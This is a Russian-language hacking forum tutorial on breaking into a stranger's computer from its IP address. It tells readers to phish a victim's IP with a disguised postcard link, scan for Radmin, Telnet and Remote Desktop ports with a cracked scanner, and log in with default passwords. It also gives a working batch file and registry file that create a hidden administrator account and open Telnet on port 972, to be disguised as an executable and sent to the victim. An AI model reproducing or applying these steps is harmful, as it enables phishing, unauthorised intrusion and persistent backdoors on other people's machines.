Ломаем комп,зная только IP!

Asiris

Легенда
27 Май 2018
142
248
190
1.) Предисловие
2.) Узнаем IP
3.) Анализируем полученные данные
4.) Если анализ ничего не дал?
5.) Теория
6.) Послесловие



====================================================

===================================================
1.) Предисловие.


Для того чтобы пользоваться этим методом, надо определиться, нужно ли это Вам в реальности, или Вам хочется просто развлечь себя и доказать, что Вы — лучший(ая). Последнее было для меня стимулом для того чтобы все это проделывать, но теперь я многое понял, а главное — понял то, что взлом не должен проводится чтобы доказать окружающим тебя людям, что ты «кулхацкер». Каким я себя не считаю. Многому надо научиться, и после практики, если все получилось, на мой взгляд, не надо от нечего делать взламывать чужие компьютеры. Итак, надеюсь с целью все определились, перейдем к действию?

====================================================
2.) Узнаем IP.


Надеюсь ни для кого не секрет, что без IP, мы не сможем найти нужный нам компьютер, и следовательно — провести взлом. Так как же его узнать? (многие задаются этим вопросом и часто пишут мне на аську). Очень просто, нам потребуеются прямые руки, немного фантазии и онлайн сниффер.
Многие используют сниффер для увода cookies (куков, печенек, сессии — кому как нравится). Но в нашем случае, cookies нас не интересуют. Мы идем сюда и регистрируемся, если раньше этого не делали. Можно юзать айпи логгеры и т.д




Отлично. Пол дела сделанно. Теперь идем в «настройки», при необходимости загружаем свое изображение. И нам дается ссылка на сниффер, с редиректом (перенаправлением) на нашу картинку. Не забудьте поставить галочку на «записывать IP в лог». Надеюсь поняли о чем я? Нет?! Тогда читайте.
Смысл в том, чтобы дать эту ссылку своей «жертве», но только со ссылкой cпрятанной в слове (изучаем html), а если в лом, то просто берете:


Здесь пишите любой текст, или одно слово

Пишите какой-нибудь текст (включайте фантазию). Возьмеме самое простое:

===========
Здравствуйте! На Ваш E-mail адрес была отправленна открытка, чтобы посмотреть ее, нажмите сюда
===========


Это было самое легкое, советую придумать что-то более оригинальней. Всю эту муть отправляете жертве. При желании можно использовать сервисы анонимной отправки почты, или залить php скрипт, и самому сделать такой сервис. Можете использовать мой, но я могу его в любой момент отключить:

mqil.su/message/

Все, осталось жертве ПЕРЕЙТИ «посмотреть картинку», как IP палится в логе.
Не надо ничего никуда вводить, как в случае с фейком. В итоге все довольны, он (она), получила свою открытку, а Вы IP.


====================================================
3.) Анализируем полученные данные


Теперь, у нас есть главное, без чего была бы невозможна дальнейшая работа. Дальнейшие действия — проверить хост (компьютер) на наличие уязвимостей — открытых портов. Я для этих целей пользуюсь сканером [XSpider 7.5], Вы можете использовать любой другой, на Ваш вкус. Но лучше всего использовать несколько сканеров, что не покажет один — покажет другой.

Сразу качаем себе [XSpider 7.5] отсюда — XSpider
Обновлять не рекомендую, так как версия крякнутая, и полностью рабочая.


Теперь когда Вы скачали его, необходимо его настроить — создать новый профиль. Кто-то на сайте описывал настройку профиля, но чтобы Вам не приходилось искать статью, я Вам опишу настройку.

Открываете сканер
Комментарий (пишите что хотите)
Идете на вкладку «Сканер Портов», и внизу рядом с надписью «default.prt» давите [...]
Выйдет окошко, давите «новый»
Пустой
В комментах пишите что угодно
внизу увидеть «добавить порты» и пишите «4899» и «3389»
Сохранить как «4899».
Дольше выходите обратно на вкладки, и снимаете отовсюду галки.
Точно также создаете еще 1 профиль, только порт 23. Все.

Теперь ****аете IP своей жертвы, в поле «добавить хост» и начинаете сканировать. Если вдруг открытым оказался один из портов 4899 — Radmin, 23 — telnet, 3389 — Remote Desktop (удаленный рабочий стол) — пробуете законнектиться (подключиться). Пароль по дефолту 12345678, об этом уже писалось. Самое лучшее (для меня), когда открыт 4899 порт (Radmin). Подключились? Радуйтсь!
Дальше можете делать все что Вашей душе угодно. Дальше читать не обязательно.


но чтобы не палиться, рекомендую Вам убрать иконку в трее (рядом с часиками), и создать нового пользователя, с правами администратора. (об этом между прочим тоже писалось раньше) — не буду писать, а то статья очень большая получится.

Remote Desktop входит в стандартную комплектацию Windows.
RAdmin Viewer думаю сами в интернете найдёте
В нем же есть и telnet
P>S
RAdmin тоже входит в стандартную комплектацию.


Если не получилось подключиться, не отчаиваемся, читаем дальше.

=====================================================
4.) Если анализ ничего не дал?


Если он ничего не дал, то можно своими усилиями помочь себе. Делается это просто, серверная часть устанавливается на удаленный компьютер/открывается нужный порт с нужным логином и паролем. Конечно, но как установить/открыть, если компьютер далеко???

— А для чего интернет?? WWW — World Wide Web — ВСЕМИРНАЯ паутина.
Через интернет тоже можно установить программу на чужой компьютер/или открыть доступ к уже существующему.
Radmin если что, тоже идет в стандартной комплектации Windows. А установить, что это действительно Windows, можно тем же сканером. Значит — нам остается только открыть доступ к этому сервису (23). Об этом до нас тоже позаботились, и написали вот такой *.txt файл, который в последствии переименовывается в *.bat.
Затем создается еще один файл, файл конфигурации реестра, который скрывает нового пользователя с глаз, и его не видно в окне приветствия.


содержимое *.bat файла
PHP:
chcp 1251
net user SUPPORT_388945a0 /delete
net user restot 12345678 /add
net localgroup Администраторы restot /add
net localgroup Пользователи SUPPORT_388945a0 /del
regedit /s conf.reg
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet
Этим файлом Вы создаете нового пользователя с именем restot и паролем 12345678
импортируете в реестр настройки, которые скроют Ваше имя в окне приветствия.
открываете 972 порт, и активируете телнет через него.


Записывается без плюсиков в блокнот, потом меняется расширение на *.bat

теперь содержимое файла conf.reg
PHP:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
NTCurrentVersionWinlogonSpecialAccountsUserLis t]
«restot»=dword:00000000
В последней строке, в кавычках, пишите имя, которое указали в *.bat файле.
также записываете в блокнот, а потом меняете расширение на *.reg


сохраняете все это в одной папке, можно просто заархивировать оба файла в один архив, а можно поступить умнее, скомпилировать файл *.bat в файл *.exe, и также добавить в архив поменяв иконку, об этом читайте в статьях на портале. После того как жертва запустит батник, можно будет коннектиться к 972 порту, или к любому другому, главное чтобы не был занят...

затем можно установить то что нужно через службу Telnet, и более комфортно управлять удаленной машиной.
==========================================================
5.) Теориия
==================


находите жертву >>> узнаете ip >>> проверяете на наличие открытых портов >>> открываете порты (если открытых не было) >>> устанавливаете через telnet то что нужно для удобство >>> осуществляете свой злобный план…
==========================================================
 
Reactions: Klin357